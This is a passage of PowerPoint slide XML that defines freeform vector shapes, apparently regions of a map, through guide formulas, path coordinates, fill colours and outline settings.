                  <a:gd name="T1" fmla="*/ 51 h 116"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 41 h 116"/>
                  <a:gd name="T4" fmla="*/ 4 w 73"/>
                  <a:gd name="T5" fmla="*/ 36 h 116"/>
                  <a:gd name="T6" fmla="*/ 4 w 73"/>
                  <a:gd name="T7" fmla="*/ 29 h 116"/>
                  <a:gd name="T8" fmla="*/ 14 w 73"/>
                  <a:gd name="T9" fmla="*/ 26 h 116"/>
                  <a:gd name="T10" fmla="*/ 15 w 73"/>
                  <a:gd name="T11" fmla="*/ 22 h 116"/>
                  <a:gd name="T12" fmla="*/ 10 w 73"/>
                  <a:gd name="T13" fmla="*/ 16 h 116"/>
                  <a:gd name="T14" fmla="*/ 23 w 73"/>
                  <a:gd name="T15" fmla="*/ 6 h 116"/>
                  <a:gd name="T16" fmla="*/ 23 w 73"/>
                  <a:gd name="T17" fmla="*/ 0 h 116"/>
                  <a:gd name="T18" fmla="*/ 27 w 73"/>
                  <a:gd name="T19" fmla="*/ 3 h 116"/>
                  <a:gd name="T20" fmla="*/ 38 w 73"/>
                  <a:gd name="T21" fmla="*/ 11 h 116"/>
                  <a:gd name="T22" fmla="*/ 43 w 73"/>
                  <a:gd name="T23" fmla="*/ 18 h 116"/>
                  <a:gd name="T24" fmla="*/ 44 w 73"/>
                  <a:gd name="T25" fmla="*/ 30 h 116"/>
                  <a:gd name="T26" fmla="*/ 47 w 73"/>
                  <a:gd name="T27" fmla="*/ 26 h 116"/>
                  <a:gd name="T28" fmla="*/ 52 w 73"/>
                  <a:gd name="T29" fmla="*/ 28 h 116"/>
                  <a:gd name="T30" fmla="*/ 61 w 73"/>
                  <a:gd name="T31" fmla="*/ 34 h 116"/>
                  <a:gd name="T32" fmla="*/ 67 w 73"/>
                  <a:gd name="T33" fmla="*/ 42 h 116"/>
                  <a:gd name="T34" fmla="*/ 65 w 73"/>
                  <a:gd name="T35" fmla="*/ 48 h 116"/>
                  <a:gd name="T36" fmla="*/ 64 w 73"/>
                  <a:gd name="T37" fmla="*/ 56 h 116"/>
                  <a:gd name="T38" fmla="*/ 54 w 73"/>
                  <a:gd name="T39" fmla="*/ 58 h 116"/>
                  <a:gd name="T40" fmla="*/ 54 w 73"/>
                  <a:gd name="T41" fmla="*/ 67 h 116"/>
                  <a:gd name="T42" fmla="*/ 56 w 73"/>
                  <a:gd name="T43" fmla="*/ 78 h 116"/>
                  <a:gd name="T44" fmla="*/ 64 w 73"/>
                  <a:gd name="T45" fmla="*/ 83 h 116"/>
                  <a:gd name="T46" fmla="*/ 67 w 73"/>
                  <a:gd name="T47" fmla="*/ 91 h 116"/>
                  <a:gd name="T48" fmla="*/ 73 w 73"/>
                  <a:gd name="T49" fmla="*/ 103 h 116"/>
                  <a:gd name="T50" fmla="*/ 65 w 73"/>
                  <a:gd name="T51" fmla="*/ 104 h 116"/>
                  <a:gd name="T52" fmla="*/ 52 w 73"/>
                  <a:gd name="T53" fmla="*/ 110 h 116"/>
                  <a:gd name="T54" fmla="*/ 43 w 73"/>
                  <a:gd name="T55" fmla="*/ 116 h 116"/>
                  <a:gd name="T56" fmla="*/ 34 w 73"/>
                  <a:gd name="T57" fmla="*/ 114 h 116"/>
                  <a:gd name="T58" fmla="*/ 25 w 73"/>
                  <a:gd name="T59" fmla="*/ 105 h 116"/>
                  <a:gd name="T60" fmla="*/ 25 w 73"/>
                  <a:gd name="T61" fmla="*/ 100 h 116"/>
                  <a:gd name="T62" fmla="*/ 22 w 73"/>
                  <a:gd name="T63" fmla="*/ 95 h 116"/>
                  <a:gd name="T64" fmla="*/ 23 w 73"/>
                  <a:gd name="T65" fmla="*/ 84 h 116"/>
                  <a:gd name="T66" fmla="*/ 28 w 73"/>
                  <a:gd name="T67" fmla="*/ 72 h 116"/>
                  <a:gd name="T68" fmla="*/ 21 w 73"/>
                  <a:gd name="T69" fmla="*/ 64 h 116"/>
                  <a:gd name="T70" fmla="*/ 22 w 73"/>
                  <a:gd name="T71" fmla="*/ 56 h 116"/>
                  <a:gd name="T72" fmla="*/ 20 w 73"/>
                  <a:gd name="T73" fmla="*/ 54 h 116"/>
                  <a:gd name="T74" fmla="*/ 14 w 73"/>
                  <a:gd name="T75" fmla="*/ 53 h 11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73"/>
                  <a:gd name="T115" fmla="*/ 0 h 116"/>
                  <a:gd name="T116" fmla="*/ 73 w 73"/>
                  <a:gd name="T117" fmla="*/ 116 h 11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73" h="116">
                    <a:moveTo>
                      <a:pt x="11" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36157" name="Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1767" y="2809"/>
                <a:ext cx="73" cy="116"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 73"/>
                  <a:gd name="T1" fmla="*/ 51 h 116"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 41 h 116"/>
                  <a:gd name="T4" fmla="*/ 4 w 73"/>
                  <a:gd name="T5" fmla="*/ 36 h 116"/>
                  <a:gd name="T6" fmla="*/ 4 w 73"/>
                  <a:gd name="T7" fmla="*/ 29 h 116"/>
                  <a:gd name="T8" fmla="*/ 14 w 73"/>
                  <a:gd name="T9" fmla="*/ 26 h 116"/>
                  <a:gd name="T10" fmla="*/ 15 w 73"/>
                  <a:gd name="T11" fmla="*/ 22 h 116"/>
                  <a:gd name="T12" fmla="*/ 10 w 73"/>
                  <a:gd name="T13" fmla="*/ 16 h 116"/>
                  <a:gd name="T14" fmla="*/ 23 w 73"/>
                  <a:gd name="T15" fmla="*/ 6 h 116"/>
                  <a:gd name="T16" fmla="*/ 23 w 73"/>
                  <a:gd name="T17" fmla="*/ 0 h 116"/>
                  <a:gd name="T18" fmla="*/ 27 w 73"/>
                  <a:gd name="T19" fmla="*/ 3 h 116"/>
                  <a:gd name="T20" fmla="*/ 38 w 73"/>
                  <a:gd name="T21" fmla="*/ 11 h 116"/>
                  <a:gd name="T22" fmla="*/ 43 w 73"/>
                  <a:gd name="T23" fmla="*/ 18 h 116"/>
                  <a:gd name="T24" fmla="*/ 44 w 73"/>
                  <a:gd name="T25" fmla="*/ 30 h 116"/>
                  <a:gd name="T26" fmla="*/ 47 w 73"/>
                  <a:gd name="T27" fmla="*/ 26 h 116"/>
                  <a:gd name="T28" fmla="*/ 52 w 73"/>
                  <a:gd name="T29" fmla="*/ 28 h 116"/>
                  <a:gd name="T30" fmla="*/ 61 w 73"/>
                  <a:gd name="T31" fmla="*/ 34 h 116"/>
                  <a:gd name="T32" fmla="*/ 67 w 73"/>
                  <a:gd name="T33" fmla="*/ 42 h 116"/>
                  <a:gd name="T34" fmla="*/ 65 w 73"/>
                  <a:gd name="T35" fmla="*/ 48 h 116"/>
                  <a:gd name="T36" fmla="*/ 64 w 73"/>
                  <a:gd name="T37" fmla="*/ 56 h 116"/>
                  <a:gd name="T38" fmla="*/ 54 w 73"/>
                  <a:gd name="T39" fmla="*/ 58 h 116"/>
                  <a:gd name="T40" fmla="*/ 54 w 73"/>
                  <a:gd name="T41" fmla="*/ 67 h 116"/>
                  <a:gd name="T42" fmla="*/ 56 w 73"/>
                  <a:gd name="T43" fmla="*/ 78 h 116"/>
                  <a:gd name="T44" fmla="*/ 64 w 73"/>
                  <a:gd name="T45" fmla="*/ 83 h 116"/>
                  <a:gd name="T46" fmla="*/ 67 w 73"/>
                  <a:gd name="T47" fmla="*/ 91 h 116"/>
                  <a:gd name="T48" fmla="*/ 73 w 73"/>
                  <a:gd name="T49" fmla="*/ 103 h 116"/>
                  <a:gd name="T50" fmla="*/ 65 w 73"/>
                  <a:gd name="T51" fmla="*/ 104 h 116"/>
                  <a:gd name="T52" fmla="*/ 52 w 73"/>
                  <a:gd name="T53" fmla="*/ 110 h 116"/>
                  <a:gd name="T54" fmla="*/ 43 w 73"/>
                  <a:gd name="T55" fmla="*/ 116 h 116"/>
                  <a:gd name="T56" fmla="*/ 34 w 73"/>
                  <a:gd name="T57" fmla="*/ 114 h 116"/>
                  <a:gd name="T58" fmla="*/ 25 w 73"/>
                  <a:gd name="T59" fmla="*/ 105 h 116"/>
                  <a:gd name="T60" fmla="*/ 25 w 73"/>
                  <a:gd name="T61" fmla="*/ 100 h 116"/>
                  <a:gd name="T62" fmla="*/ 22 w 73"/>
                  <a:gd name="T63" fmla="*/ 95 h 116"/>
                  <a:gd name="T64" fmla="*/ 23 w 73"/>
                  <a:gd name="T65" fmla="*/ 84 h 116"/>
                  <a:gd name="T66" fmla="*/ 28 w 73"/>
                  <a:gd name="T67" fmla="*/ 72 h 116"/>
                  <a:gd name="T68" fmla="*/ 21 w 73"/>
                  <a:gd name="T69" fmla="*/ 64 h 116"/>
                  <a:gd name="T70" fmla="*/ 22 w 73"/>
                  <a:gd name="T71" fmla="*/ 56 h 116"/>
                  <a:gd name="T72" fmla="*/ 20 w 73"/>
                  <a:gd name="T73" fmla="*/ 54 h 116"/>
                  <a:gd name="T74" fmla="*/ 14 w 73"/>
                  <a:gd name="T75" fmla="*/ 53 h 11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73"/>
                  <a:gd name="T115" fmla="*/ 0 h 116"/>
                  <a:gd name="T116" fmla="*/ 73 w 73"/>
                  <a:gd name="T117" fmla="*/ 116 h 11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73" h="116">
                    <a:moveTo>
                      <a:pt x="11" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36158" name="Freeform 291"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2572" y="1889"/>
                <a:ext cx="71" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 71"/>
                  <a:gd name="T1" fmla="*/ 36 h 102"/>
                  <a:gd name="T2" fmla="*/ 67 w 71"/>
                  <a:gd name="T3" fmla="*/ 40 h 102"/>
                  <a:gd name="T4" fmla="*/ 71 w 71"/>
                  <a:gd name="T5" fmla="*/ 64 h 102"/>
                  <a:gd name="T6" fmla="*/ 68 w 71"/>
                  <a:gd name="T7" fmla="*/ 71 h 102"/>
                  <a:gd name="T8" fmla="*/ 65 w 71"/>
                  <a:gd name="T9" fmla="*/ 82 h 102"/>
                  <a:gd name="T10" fmla="*/ 62 w 71"/>
                  <a:gd name="T11" fmla="*/ 81 h 102"/>
                  <a:gd name="T12" fmla="*/ 57 w 71"/>
                  <a:gd name="T13" fmla="*/ 84 h 102"/>
                  <a:gd name="T14" fmla="*/ 44 w 71"/>
                  <a:gd name="T15" fmla="*/ 86 h 102"/>
                  <a:gd name="T16" fmla="*/ 38 w 71"/>
                  <a:gd name="T17" fmla="*/ 91 h 102"/>
                  <a:gd name="T18" fmla="*/ 27 w 71"/>
                  <a:gd name="T19" fmla="*/ 97 h 102"/>
                  <a:gd name="T20" fmla="*/ 11 w 71"/>
                  <a:gd name="T21" fmla="*/ 102 h 102"/>
                  <a:gd name="T22" fmla="*/ 11 w 71"/>
                  <a:gd name="T23" fmla="*/ 92 h 102"/>
                  <a:gd name="T24" fmla="*/ 4 w 71"/>
                  <a:gd name="T25" fmla="*/ 88 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 71"/>
                  <a:gd name="T27" fmla="*/ 84 h 102"/>
                  <a:gd name="T28" fmla="*/ 10 w 71"/>
                  <a:gd name="T29" fmla="*/ 82 h 102"/>
                  <a:gd name="T30" fmla="*/ 12 w 71"/>
                  <a:gd name="T31" fmla="*/ 78 h 102"/>
                  <a:gd name="T32" fmla="*/ 16 w 71"/>
                  <a:gd name="T33" fmla="*/ 73 h 102"/>
                  <a:gd name="T34" fmla="*/ 22 w 71"/>
                  <a:gd name="T35" fmla="*/ 69 h 102"/>
                  <a:gd name="T36" fmla="*/ 17 w 71"/>
                  <a:gd name="T37" fmla="*/ 65 h 102"/>
                  <a:gd name="T38" fmla="*/ 19 w 71"/>
                  <a:gd name="T39" fmla="*/ 58 h 102"/>
                  <a:gd name="T40" fmla="*/ 26 w 71"/>
                  <a:gd name="T41" fmla="*/ 57 h 102"/>
                  <a:gd name="T42" fmla="*/ 22 w 71"/>
                  <a:gd name="T43" fmla="*/ 55 h 102"/>
                  <a:gd name="T44" fmla="*/ 17 w 71"/>
                  <a:gd name="T45" fmla="*/ 54 h 102"/>
                  <a:gd name="T46" fmla="*/ 12 w 71"/>
                  <a:gd name="T47" fmla="*/ 52 h 102"/>
                  <a:gd name="T48" fmla="*/ 6 w 71"/>
                  <a:gd name="T49" fmla="*/ 51 h 102"/>
                  <a:gd name="T50" fmla="*/ 6 w 71"/>
                  <a:gd name="T51" fmla="*/ 46 h 102"/>
                  <a:gd name="T52" fmla="*/ 11 w 71"/>
                  <a:gd name="T53" fmla="*/ 41 h 102"/>
                  <a:gd name="T54" fmla="*/ 10 w 71"/>
                  <a:gd name="T55" fmla="*/ 35 h 102"/>
                  <a:gd name="T56" fmla="*/ 6 w 71"/>
                  <a:gd name="T57" fmla="*/ 31 h 102"/>
                  <a:gd name="T58" fmla="*/ 10 w 71"/>
                  <a:gd name="T59" fmla="*/ 26 h 102"/>
                  <a:gd name="T60" fmla="*/ 19 w 71"/>
                  <a:gd name="T61" fmla="*/ 27 h 102"/>
                  <a:gd name="T62" fmla="*/ 31 w 71"/>
                  <a:gd name="T63" fmla="*/ 29 h 102"/>
                  <a:gd name="T64" fmla="*/ 35 w 71"/>
                  <a:gd name="T65" fmla="*/ 21 h 102"/>
                  <a:gd name="T66" fmla="*/ 27 w 71"/>
                  <a:gd name="T67" fmla="*/ 17 h 102"/>
                  <a:gd name="T68" fmla="*/ 32 w 71"/>
                  <a:gd name="T69" fmla="*/ 14 h 102"/>
                  <a:gd name="T70" fmla="*/ 35 w 71"/>
                  <a:gd name="T71" fmla="*/ 4 h 102"/>
                  <a:gd name="T72" fmla="*/ 44 w 71"/>
                  <a:gd name="T73" fmla="*/ 0 h 102"/>
                  <a:gd name="T74" fmla="*/ 48 w 71"/>
                  <a:gd name="T75" fmla="*/ 6 h 102"/>
                  <a:gd name="T76" fmla="*/ 49 w 71"/>
                  <a:gd name="T77" fmla="*/ 8 h 102"/>
                  <a:gd name="T78" fmla="*/ 41 w 71"/>
                  <a:gd name="T79" fmla="*/ 16 h 102"/>
                  <a:gd name="T80" fmla="*/ 38 w 71"/>
                  <a:gd name="T81" fmla="*/ 22 h 102"/>
                  <a:gd name="T82" fmla="*/ 42 w 71"/>
                  <a:gd name="T83" fmla="*/ 29 h 102"/>
                  <a:gd name="T84" fmla="*/ 53 w 71"/>
                  <a:gd name="T85" fmla="*/ 28 h 102"/>
                  <a:gd name="T86" fmla="*/ 57 w 71"/>
                  <a:gd name="T87" fmla="*/ 25 h 102"/>
                  <a:gd name="T88" fmla="*/ 61 w 71"/>
                  <a:gd name="T89" fmla="*/ 30 h 102"/>
                  <a:gd name="T90" fmla="*/ 67 w 71"/>
                  <a:gd name="T91" fmla="*/ 32 h 102"/>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71"/>
                  <a:gd name="T139" fmla="*/ 0 h 102"/>
                  <a:gd name="T140" fmla="*/ 71 w 71"/>
                  <a:gd name="T141" fmla="*/ 102 h 102"/>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71" h="102">
                    <a:moveTo>
                      <a:pt x="69" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
